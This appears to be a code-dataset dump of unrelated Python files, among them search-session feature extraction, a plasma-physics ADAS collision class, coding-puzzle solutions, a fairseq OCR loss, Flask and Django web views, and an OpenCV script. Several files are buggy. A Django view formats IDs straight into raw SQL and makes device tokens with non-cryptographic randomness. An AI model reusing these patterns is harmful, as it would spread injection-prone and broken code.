'RR', 'Clicks@3', 'Clicks@5', 'Clicks@5+', 'nDCG@3', 'nDCG@5',
'nDCG@10', 'Precision@3', 'Precision@5', 'Precision@10',
'AvgRelScore']
Session_2013 = pd.read_csv('data/TREC-Session2013/Session2013_total_feature.csv')
Session_2013_past_peak_cols = []
Session_2013_past_end_cols = []
Session_2013_past_ave_cols = []
for col in tqdm(Session_2013_base_cols):
Session_2013[col+'_peak'] = Session_2013.progress_apply(peak, args=(Session_2013, col,), axis=1)
Session_2013[col+'_ave'] = Session_2013.progress_apply(ave, args=(Session_2013, col,), axis=1)
Session_2013[col+'_end'] = Session_2013.progress_apply(end, args=(Session_2013, col,), axis=1)
Session_2013_past_peak_cols.append(col+'_peak')
Session_2013_past_ave_cols.append(col+'_ave')
Session_2013_past_end_cols.append(col+'_end')
Session_2013.to_csv('data/TREC-Session2013/Session2013_total_feature.csv')
"""
================================================================================================
THU-KDD19
================================================================================================
"""
THU_KDD19_base_cols = ['QueryLength', 'QueryDwellTime', 'NewTerm', 'QuerySim',
'ClickCount', 'QueryRelDocCount', 'QueryKeyDocCount',
'TaskRelDocCount', 'TaskKeyDocCount', 'QueryNDCG@3', 'QueryNDCG@5',
'QueryNDCG@10', 'TaskNDCG@3', 'TaskNDCG@5', 'TaskNDCG@10',
'QueryPrecision@3', 'QueryPrecision@5', 'QueryPrecision@10',
'TaskPrecision@3', 'TaskPrecision@5', 'TaskPrecision@10',
'Clicks@3', 'Clicks@5', 'Clicks@10', 'AveQueryRelScore',
'AveTaskRelScore', 'NewTerm', 'QuerySim', 'ClickDepth']
THU_KDD19 = pd.read_csv('data/THU-KDD19/KDD19_total_feature.csv')
THU_KDD19_past_peak_cols = []
THU_KDD19_past_end_cols = []
THU_KDD19_past_ave_cols = []
for col in tqdm(THU_KDD19_base_cols):
THU_KDD19[col+'_peak'] = THU_KDD19.progress_apply(peak, args=(THU_KDD19, col,), axis=1)
THU_KDD19[col+'_ave'] = THU_KDD19.progress_apply(ave, args=(THU_KDD19, col,), axis=1)
THU_KDD19[col+'_end'] = THU_KDD19.progress_apply(end, args=(THU_KDD19, col,), axis=1)
THU_KDD19_past_peak_cols.append(col+'_peak')
THU_KDD19_past_ave_cols.append(col+'_ave')
THU_KDD19_past_end_cols.append(col+'_end')
THU_KDD19.to_csv('data/THU-KDD19/KDD19_total_feature.csv')
statistic_cols = {'dataset': ['Session2014', 'Session2013', 'KDD19'],
'past_peak_cols': [Session_2014_past_peak_cols, Session_2013_past_peak_cols, THU_KDD19_past_peak_cols],
'past_ave_cols': [Session_2014_past_ave_cols, Session_2013_past_ave_cols, THU_KDD19_past_ave_cols],
'past_end_cols': [Session_2014_past_end_cols, Session_2013_past_end_cols, THU_KDD19_past_end_cols]}
statistic_cols = pd.DataFrame(statistic_cols)
statistic_cols.to_csv('data/data_with_refer_feature/statistic_cols.csv') |
991,224 | 520c0a87714b0aab2b904bb9a2650ef927c15c73 | input = [line.rstrip() for line in open("day22/input.txt").readlines()] |
991,225 | 342812218443b40b4d1598dfff0f25170b85eb01 | import numpy as np
from . import ADAS_file as adas
from scipy import interpolate
from sdp.settings.unitsystem import SI
class Collisions:
r""" Class containing all the physics about the collisions
Read the files from ADAS database, compute the lifetime, and the cross-sections (cubic spline interpolation is used).
For computing the coefficients, two interpolations are done.
A first one in 2D (beam energy and density) and a second one in temperature.
The final result is given by:
.. math::
C = \frac{\text{Interp}(E_b,\rho)\cdot \text{Interp}(T)}{C_\text{ref}}
where :math:`C_\text{ref}` is the coefficient at the reference temperature, density and beam energy.
:param list[str] files_atte: List of names for ADAS21 files (beam stopping coefficient)
:param list[str] files_emis: List of names for ADAS22 files (emission coefficient)
:param list[int] states: Quantum number of the lower (states[0]) and the higher(states[1]) states of the hydrogen atom
:param float lifetime: Lifetime of the excited state
:var list[str] self.files_atte: List of names for ADAS21 files (beam stopping coefficient)
:var list[str] self.files_emis: List of names for ADAS22 files (emission coefficient)
:var list[] self.beam_atte: List of :class:`ADAS21 <sdp.plasma.collision.ADAS_file.ADAS21>` instance variable (beam stopping coefficient)
:var list[] self.beam_emis: List of :class:`ADAS22 <sdp.plasma.collision.ADAS_file.ADAS22>` instance variable (emission coefficient)
:var list[tck_interp] self.atte_tck_dens: List of interpolant computed with cubic spline for the beam stopping coefficient as a function of the density and the beam energy
:var list[tck_interp] self.emis_tck_dens: List of interpolant computed with cubic spline for the emission coefficient as a function of the density and the beam energy
:var list[tck_interp] self.atte_tck_temp: List of interpolant computed with cubic spline for the beam stopping coefficient as a function of the temperature
:var list[tck_interp] self.emis_tck_temp: List of interpolant computed with cubic spline for the emission coefficient as a function of the temperature
:var float self.n_low: Quantum number of the lower state for the hydrogen atom
:var float self.n_high: Quantum number of the higher state for the hydrogen atom
:var float self.E0: Energy of the ground state (in eV)
:var float self.lifetime: Lifetime of the excited state
"""
def __init__(self,files_atte,files_emis,states,lifetime):
""" Copy the input inside the instance
:param list[str] files_atte: List of names for ADAS21 files (beam stopping coefficient)
:param list[str] files_emis: List of names for ADAS22 files (emission coefficient)
:param list[int] states: Quantum number of the lower (states[0]) and the higher(states[1]) states of the hydrogen atom
"""
self.files_atte = files_atte #!
self.files_emis = files_emis #!
self.beam_emis = [] #!
self.beam_atte = [] #!
print('The wavelength assumes an hydrogen atom')
self.n_low = states[0] #!
self.n_high = states[1] #!
self.E0 = -13.6
self.lifetime = lifetime
self.read_adas()
# compute the interpolant
self.atte_tck_dens = [] #!
self.emis_tck_dens = [] #!
self.atte_tck_temp = [] #!
self.emis_tck_temp = [] #!
for i in range(len(self.beam_atte)):
# get data
ldensities = np.log(self.get_list_density('atte',i))
lbeams = np.log(self.get_list_beams('atte',i))
coef_dens = self.get_coef_density('atte',i)
lbeams, ldens = np.meshgrid(lbeams, ldensities)
# interpolation over beam and density
self.atte_tck_dens.append(interpolate.bisplrep(
lbeams,ldens,coef_dens,kx=1,ky=1))
# get data for the interpolation in temperature
T = np.log(self.get_list_temperature('atte',i))
coef_T = self.get_coef_T('atte',i)
Tref = np.log(self.get_Tref('atte',i))
index = abs((Tref-T)/Tref) < 1e-4
#interpolation over the temperature
self.atte_tck_temp.append(interpolate.splrep(
T,coef_T/coef_T[index],k=1))
for i in range(len(self.beam_emis)):
# get data
ldensities = np.log(self.get_list_density('emis',i))
lbeams = np.log(self.get_list_beams('emis',i))
coef_dens = self.get_coef_density('emis',i)
lbeams, ldens = np.meshgrid(lbeams, ldensities)
# interpolation over beam and density
self.emis_tck_dens.append(interpolate.bisplrep(
lbeams,ldens,coef_dens,kx=1,ky=1))
# Get data for the interpolation in temperature
T = np.log(self.get_list_temperature('emis',i))
coef_T = self.get_coef_T('emis',i)
Tref = np.log(self.get_Tref('emis',i))
index = abs((Tref-T)/Tref) < 1e-4
#interpolation over the temperature
self.emis_tck_temp.append(interpolate.splrep(
T,coef_T/coef_T[index],k=1))
def read_adas(self):
""" Read the ADAS files and stores them as attributes (used during the initialization)
"""
for name in self.files_atte:
self.beam_atte.append(adas.ADAS21(name))
for name in self.files_emis:
self.beam_emis.append(adas.ADAS22(name))
def get_attenutation(self,beam,ne,mass_b,Ti,file_number):
""" Get the beam stopping coefficient for a given density, beam energy, and temperature.
The ADAS database store the data as two array, for putting them together, we do a first
interpolation for the 2D array (as a function of density and beam energy) and after
we do a scaling with the temperature.
:param float beam: Beam energy (eV)
:param float or np.array[N] ne: Electron density density
:param float mass_b: mass of a neutral particle in the beam (amu)
:param float or np.array[N] Ti: Ion temperature (should be of the same lenght than ne)
:param int file_number: File number wanted (choosen by beam.py)
:returns: Beam stopping coefficient
:rtype: np.array[ne.shape]
"""
beam = np.log(beam/mass_b)
ne = np.log(ne)
Ti = np.log(Ti)
if len(ne.shape) == 1:
coef = np.zeros(ne.shape)
for i,n in enumerate(ne):
coef[i] = interpolate.bisplev(beam,n,self.atte_tck_dens[file_number])
else:
coef = interpolate.bisplev(beam,ne,self.atte_tck_dens[file_number])
coef = coef * interpolate.splev(Ti,self.atte_tck_temp[file_number])
return coef
def get_emission(self,beam,ne,mass_b,Ti,file_number):
""" Get the emission coefficient for a given density, beam energy, and temperature.
The ADAS database store the data as two array, for putting them together, we do a first
interpolation for the 2D array (as a function of density and beam energy) and after
we do a scaling with the temperature.
:param float beam: Beam energy (eV)
:param float or np.array[N] ne: Electron density density
:param float mass_b: mass of a neutral particle in the beam (amu)
:param float or np.array[N] Ti: Ion temperature (should be of the same lenght than ne)
:param int file_number: File number wanted (choosen by beam.py)
:returns: Emission coefficient
:rtype: np.array[ne.shape]
"""
beam = np.log(beam/mass_b)
ne = np.log(ne)
Ti = np.log(Ti)
if not isinstance(ne,float):
coef = np.zeros(len(ne))
for i in range(len(ne)):
coef[i] = interpolate.bisplev(beam,ne[i],self.emis_tck_dens[file_number])
else:
coef = interpolate.bisplev(beam,ne,self.emis_tck_dens[file_number])
coef = coef * interpolate.splev(Ti,self.emis_tck_temp[file_number])
return coef
def get_Tref(self,typ,file_number):
""" Return the reference temperature of the attenuation[beam stopping\
coefficient]/emission file
:param str typ: Choice of the type of file ('emis' or 'atte')
:param int file_number: File number (choosen in beam.py)
:returns: Reference temperature
:rtype: float
"""
if typ == 'emis':
return self.beam_emis[file_number].T_ref
elif typ == 'atte':
return self.beam_atte[file_number].T_ref
else:
raise NameError('No list with this name: {0}'.format(typ))
def get_coef_density(self,typ,file_number):
""" Return the coefficient as a function of the density and the beam energy\
of the attenuation[beam stopping coefficient]/emission file
:param str typ: Choice of the type of file ('emis' or 'atte')
:param int file_number: File number (choosen in beam.py)
:returns: Coefficient as a function of the density and the beam energy
:rtype: np.array[Ndens,Nbeam]
"""
if typ == 'emis':
return self.beam_emis[file_number].coef_dens
elif typ == 'atte':
return self.beam_atte[file_number].coef_dens
else:
raise NameError('No list with this name: {0}'.format(typ))
def get_coef_T(self,typ,file_number):
""" Return the coefficient as a function of the temperature\
of the attenuation[beam stopping coefficient]/emission file
:param str typ: Choice of the type of file ('emis' or 'atte')
:param int file_number: File number (choosen in beam.py)
:returns: Coefficient as a function of the temperature
:rtype: np.array[N]
"""
if typ == 'emis':
return self.beam_emis[file_number].coef_T
elif typ == 'atte':
return self.beam_atte[file_number].coef_T
else:
raise NameError('No list with this name: {0}'.format(typ))
def get_list_temperature(self,typ,file_number):
""" Return the temperatures used in the ADAS file for\
the attenuation[beam stopping coefficient]/emission file
:param str typ: Choice of the type of file ('emis' or 'atte')
:param int file_number: File number (choosen in beam.py)
:returns: Temperatures computed in the ADAS file
:rtype: np.array[N]
"""
if typ == 'emis':
return self.beam_emis[file_number].temperature
elif typ == 'atte':
return self.beam_atte[file_number].temperature
else:
raise NameError('No list with this name: {0}'.format(typ))
def get_list_density(self,typ,file_number):
""" Return the densities used in the ADAS file for\
the attenuation[beam stopping coefficient]/emission file
:param str typ: Choice of the type of file ('emis' or 'atte')
:param int file_number: File number (choosen in beam.py)
:returns: Densities computed in the ADAS file
:rtype: np.array[N]
"""
if typ == 'emis':
return self.beam_emis[file_number].densities
elif typ == 'atte':
return self.beam_atte[file_number].densities
else:
raise NameError('No list with this name: {0}'.format(typ))
def get_list_beams(self,typ,file_number):
""" Return the beam energies used in the ADAS file for\
the attenuation[beam stopping coefficient]/emission file
:param str typ: Choice of the type of file ('emis' or 'atte')
:param int file_number: File number (choosen in beam.py)
:returns: Beam energies computed in the ADAS file
:rtype: np.array[N]
"""
if typ == 'emis':
# multiply by the mass due to ADAS
return self.beam_emis[file_number].adas_beam
elif typ == 'atte':
return self.beam_atte[file_number].adas_beam
else:
raise NameError('No list with this name: {0}'.format(typ))
def get_lifetime(self,ne,Te,beam,mass_b,file_number):
""" Compute the lifetime of the excited state.
This version is using the lifetime given in the input but can be upgraded in order
to have a plasma dependant lifetime.
:todo: Upgrading in order to take into account the plasma density
:param float beam: Beam energy (eV)
:param np.array[N] ne: Electron density (m :sup:`-3`)
:param float mass_b: Mass of a neutral particle in the beam (amu)
:param np.array[N] Te: Electron temperature (eV)
:param int file_number: File number (choosen in Beam.py)
:returns: Lifetime of the excited atom
:rtype: np.array[ne.shape]
"""
return self.lifetime*np.ones(ne.shape)
def get_wavelength(self):
""" Compute the wavelength of the emitted photons in the particles
reference frame (assume an hydrogen atom).
:returns: Wavelength emitted in reference frame (nm)
:rtype: float
"""
E = -self.E0*(1.0/self.n_low**2 - 1.0/self.n_high**2)
return SI['hc']*1e12/(E*SI['keV'])
if __name__ == '__main__':
'small test and example'
import matplotlib.pyplot as plt
# check the computation of the lifetime
path = 'sdp/diagnostic/bes/'
col = Collisions([path+'bms10#h_h1.dat'],[path+'bme10#h_h1.dat'],[2, 3])
Ebeam = col.beam_atte[0].E_ref
dens = col.beam_atte[0].densities
T = col.beam_atte[0].temperature
lifetime = np.zeros((T.shape[0],dens.shape[0]))
for i,t in enumerate(T):
lifetime[i,:] = col.get_lifetime(dens,t,t,Ebeam,1.0,0)
plt.figure()
plt.contourf(dens,T,lifetime)
plt.colorbar()
plt.show()
'small check for the emission and the beam stopping coefficient'
ne = np.linspace(np.min(dens),np.max(dens),1000)
t_ref = T[4]
at = col.get_attenutation(Ebeam,ne,1.0,t_ref,0)
em = col.get_emission(Ebeam,ne,1.0,t_ref,0)
if ((at < 0) | (em < 0)).any():
print(np.sum(at<0),at[at<0])
print(np.sum(em<0),em[em<0])
plt.figure()
plt.semilogx(ne,em<0,label='emission')
plt.semilogx(ne,at<0,label='attenuation')
plt.semilogx(dens,dens>0,'x')
plt.legend()
plt.figure()
plt.semilogx(ne,em)
plt.show()
raise NameError('Error in the interpolation or in the ADAS file')
|
991,226 | bcd4101ed1f75887eb951787172a691783b69406 | class Solution:
def flipAndInvertImage(self, A):
for index, value in enumerate(A):
A[index] = value[::-1]
for i in range(len(A)):
for j in range(len(A[0])):
A[i][j] = (A[i][j]+1)%2
return A
# 这个列表生成式和异或操作用的很6
def flipAndInvertImage1(self, A):
return [[1 ^ i for i in row[::-1]] for row in A]
a = Solution()
print(a.flipAndInvertImage([[1,1,0,0],[1,0,0,1],[0,1,1,1],[1,0,1,0]])) |
991,227 | 07ea0862aa853ef551fdbcb3bf82c836ffd97300 | """
2D Array - DS
THis function should take a random 6x6 array and postion wise get a sum of all of the elements in the
"""
import traceback
def hourglass_max_sum(d_array: list) -> int:
"""
Params: an array that is a 6X6
Return: a max value of the patern defined in the array
"""
# print(d_array)
hour_glass =[ [0,0], [0, 1], [0, 2], [1, 1], [2, 0], [2, 1], [2,2] ]
hour_glass_reset =[0, 1, 2, 1, 0, 1, 2]
sum =0
stop= [5,5]
max =0
# While the last list inst on [5,5]
while hour_glass[len(hour_glass) -1] != stop:
if hour_glass[len(hour_glass) - 1][1] >= 5:
for couple in hour_glass:
couple[0] += 1
for i in range(len(hour_glass)):
hour_glass[i][1] = hour_glass_reset[i]
print(hour_glass)
for pos in hour_glass:
sum += d_array[pos[0]][pos[1]]
if sum > max:
max = sum
sum = 0
print(max)
print(sum)
for couple in hour_glass:
couple[1] += 1
return max
if __name__ == "__main__":
test_list = [
[1, 1, 1, 0, 0, 0],
[0, 1, 0, 0, 0, 0],
[1, 1, 1, 0, 0, 0],
[0, 0, 2, 4, 4, 0],
[0, 0, 0, 2, 0, 0],
[0, 0, 1, 2, 4, 0]
]
test_list_2=[
[-9, -9, -9, 1, 1, 1],
[0, -9, 0, 4, 3, 2],
[-9, -9, -9, 1, 2, 3],
[0, 0, 8, 6, 6, 0],
[0, 0, 0, -2, 0, 0],
[0, 0, 1, 2, 4, 0]
]
print(hourglass_max_sum(test_list)) |
991,228 | fee1452b9b047ccd0f941c3ebd1766337f60f524 | """Given a 26 letter character set, which is equivalent to character
set of English alphabet i.e. (abcd….xyz) and act as a relation.
We are also given several sentences and we have to translate them with
the help of given new character set."""
# utf-8
def newString(charset,input):
oricharset = "abcdefghijklmnopqrstuvwxyz"
mapchars=dict(zip(charset,oricharset))
output = [mapchars[chr] for chr in input ]
print("".join(output))
if __name__ == "__main__":
charSet = 'qwertyuiopasdfghjklzxcvbnm'
input = 'utta'
newString(charSet,input)
|
991,229 | 36c61ac4c46d0fd24c275c3bb92bc1bda8de1542 | #!/usr/bin/env python
HELP = """
[hh] Help
[qq] Quit
[rr] Reset
Input (Letters): <a-z>...
"""
WORDS = [
'about', 'after', 'again', 'below', 'could',
'every', 'first', 'found', 'great', 'house',
'large', 'learn', 'never', 'other', 'place',
'plant', 'point', 'right', 'small', 'sound',
'spell', 'still', 'study', 'their', 'there',
'three', 'thing', 'think', 'three', 'water',
'where', 'which', 'world', 'would', 'write',
]
def run():
i, words = 0, set(WORDS)
while True:
_input = raw_input("[SIGNAL] #{} Letters: ".format(i+1))
if not _input:
continue
if _input == 'hh':
print HELP
continue
if _input == 'qq':
break
if _input == 'rr':
i, words = 0, set(WORDS)
print "Restarted"
continue
letters = set(_input)
for w in list(words):
if w[i] not in letters:
words.discard(w)
print "Possible Answers: ", list(words)
i += 1
def main():
run()
if __name__ == "__main__":
main()
|
991,230 | 43297ff15d5fd3695d0026a3bb5917d627cef411 | import torch
import torch.nn.functional as F
from fairseq.criterions import FairseqCriterion, register_criterion
@register_criterion('ocrseq_loss')
class OCRSeqLossCriterion(FairseqCriterion):
def __init__(self, args, task):
super(FairseqCriterion, self).__init__()
self.args = args
self.blank_idx = task.target_dictionary.blank()
self.padding_idx = task.target_dictionary.pad()
def forward(self, model, sample, reduction='mean'):
"""Compute the loss for the given sample.
Returns a tuple with three elements:
1) the loss
2) the sample size, which is used as the denominator for the gradient
3) logging outputs to display while training
"""
net_output = model(**sample['net_input'])
net_output_middle = net_output['encoder_output']
net_output_final, _ = net_output['decoder_output']
loss = self.compute_loss_ctc(model, net_output_middle, sample, reduction=reduction) + \
self.compute_cross_entropy_loss(model, net_output_final, sample)
sample_size = sample['nsentences'] if self.args.sentence_avg else sample['ntokens']
logging_output = {
'loss': loss.item(),
'ntokens': sample['ntokens'],
'nsentences': sample['nsentences'],
'sample_size': sample_size,
}
return loss, sample_size, logging_output
def compute_cross_entropy_loss(self, model, net_output, sample, reduce=True):
lprobs = model.get_normalized_probs(net_output, log_probs=True)
lprobs = lprobs.view(-1, lprobs.size(-1))
target = sample['target'].view(-1)
loss = F.nll_loss(
lprobs,
target,
ignore_index=self.padding_idx,
reduction='mean' if reduce else 'none',
)
return loss
def compute_loss_ctc(
self, model, net_output, sample,
reduction='mean', zero_infinity=False,
):
log_probs = model.get_normalized_probs(net_output, log_probs=True)
targets = torch.cat(sample['target_simply']) # Expected targets to have CPU Backend
target_lengths = sample['target_length']
input_lengths = torch.full((sample['nsentences'],), log_probs.size(0), dtype=torch.int32)
loss = F.ctc_loss(log_probs, targets, input_lengths, target_lengths,
blank=self.blank_idx, reduction=reduction,
zero_infinity=zero_infinity)
return loss
@staticmethod
def aggregate_logging_outputs(logging_outputs):
"""Aggregate logging outputs from data parallel training."""
# assert len(logging_outputs) == 1
log = logging_outputs[0]
loss = log.get('loss', 0)
ntokens = log.get('ntokens', 0)
batch_sizes = log.get('nsentences', 0)
sample_size = log.get('sample_size', 0)
agg_output = {
'loss': loss,
'ntokens': ntokens,
'nsentences': batch_sizes,
'sample_size': sample_size,
}
return agg_output
|
991,231 | b31ec74fc907ae955ec8019fe515df3eeeb9e9e0 | from django.shortcuts import render
from django.views.generic import View
from django.http import HttpResponseRedirect
from django.urls import reverse
import random
import string
from kimo.models import Device, Copil
from kimo.models import Copil
from kimo.models import Legatura
from settings import SESSION_USER_ID_FIELD_NAME
class AccountSettings(View):
def get(self, request):
return render(request, 'kimo/base.html')
class Child(View):
def get(self, request):
return render(request, 'account_settings/child.html')
def post(self, request):
try:
firstname = request.POST.get('firstname')
lastname = request.POST.get('lastname')
request.session['child_firstname'] = firstname
request.session['child_lastname'] = lastname
return HttpResponseRedirect(reverse('account_settings:token'))
parinte=request.session.get(SESSION_USER_ID_FIELD_NAME)
firstname=request.POST.get('firstname')
lastname=request.POST.get('lastname')
copil1=Copil.objects.create(
nume=request.POST.get('firstname'),
prenume=request.POST.get('lastname')
)
copil1.save()
copil=Copil.objects.raw('Select * from (select * from copil order by id desc) where rownum<2')
print(copil[0].prenume,copil[0].id)
legatura=Legatura.objects.raw('insert into legatura(id_parinte,id_copil) values ({},{})'.format(parinte,copil[0].id))
except Exception as exc:
e = exc
return render(request, 'account_settings/child.html', context={
'error': e
})
class Token(View):
def get(self, request):
firstname = request.session.get('child_firstname')
lastname = request.session.get('child_lastname')
if firstname and lastname:
del request.session['child_firstname']
del request.session['child_lastname']
token = ''.join(random.choices(string.ascii_letters + string.digits, k=6))
Copil.objects.create(prenume=firstname, nume=lastname)
c = Copil.objects.filter(prenume=firstname, nume=lastname)[0]
Device.objects.create(id_copil=c.id, token=token)
Legatura.objects.create(id_copil=c.id, id_parinte=request.session[SESSION_USER_ID_FIELD_NAME])
return render(request, 'account_settings/token.html', context={
'childname': firstname,
'childlastname': lastname,
'token': token
})
try:
del request.session['child_firstname']
del request.session['child_lastname']
except:
pass
return HttpResponseRedirect(reverse('account_settings:add_child'))
class Pass(View):
def get(self, request):
return render(request, 'account_settings/change_password.html')
def post(self,request):
e='Success'
try:
new_password=request.POST.get('password')
print(new_password)
except Exception as exc:
e = exc
return render(request, 'account_settings/change_password.html', context={
'error': e,
})
|
991,232 | d5a835d9b09d6e9cd4cc1c044bce5cacba8dbf2c | with open('./doc.txt') as f1, open('./docie.txt') as f2:
for line1, line2 in zip(f1, f2):
print(line1 + line2) |
991,233 | c4538f013f8f8d7f310da668f0d29201055f6b10 | import abc
import argparse
import json
import re
import psycopg2
from flask import (
Flask,
request,
make_response,
)
app = Flask(__name__)
class TaskStore(metaclass=abc.ABCMeta):
@abc.abstractmethod
def add(self, summary, description):
pass
@abc.abstractmethod
def get_task(self, task_id):
pass
@abc.abstractmethod
def delete_task(self, task_id):
pass
@abc.abstractmethod
def update_task(self, task_id, summary, description):
pass
@abc.abstractmethod
def all_tasks(self):
pass
class MemoryTaskStore(TaskStore):
def __init__(self):
self._init_store()
def new_id(self):
id = self._last_id
self._last_id += 1
return id
def add(self, summary, description):
task_id = self.new_id()
task = {
'id': task_id,
'summary': summary,
'description': description,
}
self.tasks[task_id] = task
return task_id
def get_task(self, task_id):
try:
return self.tasks[task_id]
except KeyError:
return None
def delete_task(self, task_id):
try:
del self.tasks[task_id]
return True
except KeyError:
return False
def update_task(self, task_id, summary, description):
try:
task = self.tasks[task_id]
except KeyError:
return False
task['summary'] = summary
task['description'] = description
return True
def all_tasks(self):
return iter(self.tasks.values())
def clear(self):
cleared = len(self.tasks)
self._init_store()
return cleared
def _init_store(self):
self._last_id = 0
self.tasks = {}
class DbTaskStore(TaskStore):
def __init__(self):
self.dsn = 'dbname=todoserver user=www-data'
def add(self, summary, description):
insert_stmt = 'INSERT INTO tasks (summary, description) VALUES (%s, %s) RETURNING id'
with psycopg2.connect(self.dsn) as conn:
with conn.cursor() as cur:
cur.execute(insert_stmt, (summary, description))
task_id = cur.fetchone()[0]
return task_id
def get_task(self, task_id: int):
cols = (
'id',
'summary',
'description',
)
select_stmt = 'select ' + ','.join(cols) + ' from tasks WHERE id = %s'
with psycopg2.connect(self.dsn) as conn:
with conn.cursor() as cur:
cur.execute(select_stmt, (task_id,))
row = cur.fetchone()
if row is None:
return None
return dict(zip(cols, row))
def update_task(self, task_id, summary, description):
fields = [
summary,
description,
]
clauses = [
'summary = %s',
'description = %s',
]
statement = 'UPDATE tasks SET ' + ', '.join(clauses) + ' WHERE id = %s'
fields.append(task_id)
with psycopg2.connect(self.dsn) as conn:
with conn.cursor() as cur:
cur.execute(statement, fields)
count = _update_count(cur.statusmessage)
assert count in {0, 1}, count
return count == 1
def delete_task(self, task_id):
with psycopg2.connect(self.dsn) as conn:
with conn.cursor() as cur:
cur.execute('DELETE FROM tasks WHERE id = %s', (task_id,))
count = _delete_count(cur.statusmessage)
assert count in {0, 1}, count
return count == 1
def all_tasks(self):
cols = (
'id',
'summary',
'description',
)
select_stmt = 'select ' + ','.join(cols) + ' from tasks'
with psycopg2.connect(self.dsn) as conn:
with conn.cursor() as cur:
cur.execute(select_stmt)
for row in cur:
yield dict(zip(cols, row))
def clear(self):
with psycopg2.connect(self.dsn) as conn:
with conn.cursor() as cur:
cur.execute('DELETE FROM tasks')
count = _delete_count(cur.statusmessage)
return count
def _delete_count(statusmessage):
match = re.match(r'DELETE (\d+)$', statusmessage)
assert match is not None, statusmessage
return int(match.group(1))
def _update_count(statusmessage):
match = re.match(r'UPDATE (\d+)$', statusmessage)
assert match is not None, statusmessage
return int(match.group(1))
DEFAULT_STORE = 'db'
store_types = {
'memory': MemoryTaskStore,
'db': DbTaskStore,
}
assert DEFAULT_STORE in store_types
store = store_types[DEFAULT_STORE]()
def get_args():
parser = argparse.ArgumentParser()
parser.add_argument('--port', default=5000, type=int)
parser.add_argument('--host', default='127.0.0.1', type=str)
parser.add_argument('--store', default=DEFAULT_STORE, choices=store_types.keys(),
help='storage backend')
parser.add_argument('--debug', action='store_true', default=False)
return parser.parse_args()
def init_store(store_type_name):
global store
store_type = store_types[store_type_name]
store = store_type()
@app.route('/tasks/', methods=['GET'])
def get_tasks():
return json.dumps([
{'id': task['id'], 'summary': task['summary']}
for task in store.all_tasks()])
@app.route('/tasks/<int:task_id>/', methods=['GET'])
def describe_task(task_id):
task = store.get_task(task_id)
if task is None:
return make_response('', 404)
return json.dumps(task)
@app.route('/tasks/', methods=['POST'])
def add_task():
data = request.get_json()
task_id = store.add(data['summary'], data['description'])
return make_response(json.dumps({'id': task_id}), 201)
@app.route('/tasks/ALL/', methods=['DELETE'])
def wipe_tasks():
deleted = store.clear()
return make_response(json.dumps({'deleted': deleted}), 200)
@app.route('/tasks/<int:task_id>/', methods=['DELETE'])
def task_done(task_id):
did_exist = store.delete_task(task_id)
if did_exist:
return ''
return make_response('', 404)
@app.route('/tasks/<int:task_id>/', methods=['PUT'])
def update_task(task_id):
data = request.get_json()
did_update = store.update_task(task_id, data['summary'], data['description'])
if did_update:
return ''
return make_response('', 404)
if __name__ == '__main__':
args = get_args()
if args.store == 'memory':
init_store(args.store)
if args.debug:
app.debug = True
app.run(host=args.host, port=args.port)
|
991,234 | 1837bc17b0ce2a263ee53859b9826274f2b6e0f5 | import cv2
import numpy as np
import matplotlib.pyplot as plt
import matplotlib.image as mpimg
def get_object(input):
BLACK_THRESHOLD = 200
LOW_SIZE_THRESHOLD = 30
MAX_SIZE_THRESHOLD = 450
# Denoising
imgray = cv2.GaussianBlur(input, (5, 5), 0)
# imgray = cv2.cvtColor(imgray, cv2.COLOR_BGR2GRAY)
# Trying different Thresholding techniques
# ret, thresh = cv2.threshold(imgray,10,200,cv2.THRESH_BINARY+cv2.THRESH_OTSU)
ret, thresh = cv2.threshold(imgray,0,255,cv2.THRESH_TRIANGLE)
contours, hierarchy = cv2.findContours(thresh, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
#cv2.imshow('thresh', thresh)
idx = 0
for cnt in contours:
idx += 1
x, y, w, h = cv2.boundingRect(cnt)
roi = img[y:y + h, x:x + w]
if h < LOW_SIZE_THRESHOLD or w < LOW_SIZE_THRESHOLD or\
h > MAX_SIZE_THRESHOLD or w > MAX_SIZE_THRESHOLD:
continue
# cv2.imwrite(str(idx) + '.png', roi)
cv2.rectangle(img, (x, y), (x + w, y + h), (200, 0, 0), 2)
return img
# Open an image using Opencv
img = cv2.imread("image_tech/Q2.jpeg")
# Convert the image into different colorspaces
# cvt_image = cv2.cvtColor(img,cv2.COLOR_BGR2HSV_FULL)
cvt_image = cv2.cvtColor(img,cv2.COLOR_BGR2LAB)
# cvt_image = cv2.cvtColor(img,cv2.COLOR_BGR2LUV)
# Save each channel of the image seperately
c1 = cvt_image[:, :, 0]
c2 = cvt_image[:, :, 1]
c3 = cvt_image[:, :, 2]
# Create a new window to show all the three channels seperately
f, (ax1, ax2, ax3) = plt.subplots(1,3, figsize=(10,5))
ax1.set_title("Channel 1")
ax1.imshow(c1)
ax2.set_title("Channel 2")
ax2.imshow(c2)
ax3.set_title("Channel 3")
ax3.imshow(c3)
plt.show()
im= c1
print(im.shape)
im = cv2.resize(im, (640, 480))
out = get_object(im)
cv2.imshow('Threshold', img)
cv2.imshow('Output', out)
cv2.waitKey() |
991,235 | d7736c6e5f7ed8305f50ffeac7845078968c26ac | import math
from exercise_4 import arc
try:
# see if Swampy is installed as a package
from swampy.TurtleWorld import *
except ImportError:
# otherwise see if the modules are on the PYTHONPATH
from TurtleWorld import *
def petal(t, r, angle):
for i in range(2):
arc(t, r, angle)
lt(t, 180 - angle)
def flower(t, n, r, angle):
for i in range(n):
petal(t, r, angle)
lt(t, 360.0 / n)
def move(t, length):
pu(t)
fd(t, length)
pd(t)
world = TurtleWorld()
ray = Turtle()
ray.delay = 0.001
move(ray, 10)
flower(ray, 5, 100, 60)
wait_for_user()
|
991,236 | 0c80d91f5f95ed0a069f72bcfaa1258be9178c54 | from sqlalchemy import Column, String
from models import DecBase
class User(DecBase):
""" A user is a person who interacts with the solar network by browsing, posting, or commenting in beams.
Attributes:
seed: BIP32 XPrivKey used to generate Bitcoin wallets
url: address of users personal page
"""
__tablename__ = 'user'
seed = Column(String)
url = Column(String, primary_key=True, nullable=False)
|
991,237 | c80bd314d62607628bf1e0f436f000f2bad0c5a4 | from django.shortcuts import render, redirect, render_to_response
from django.http import HttpResponse, HttpResponseRedirect,Http404
from .forms import LoginForm, LogupForm, CommentForm
from .models import MyUser, Artical, Comment, Poll
from django.contrib.auth.models import User
from django.contrib.auth import authenticate, login, logout
from django.contrib.auth.decorators import login_required
from urllib.parse import urljoin
import markdown2
# Create your views here.
def index(request):
artical_latest = Artical.objects.filter(column__column='新闻').order_by('-pub_date')[:3]
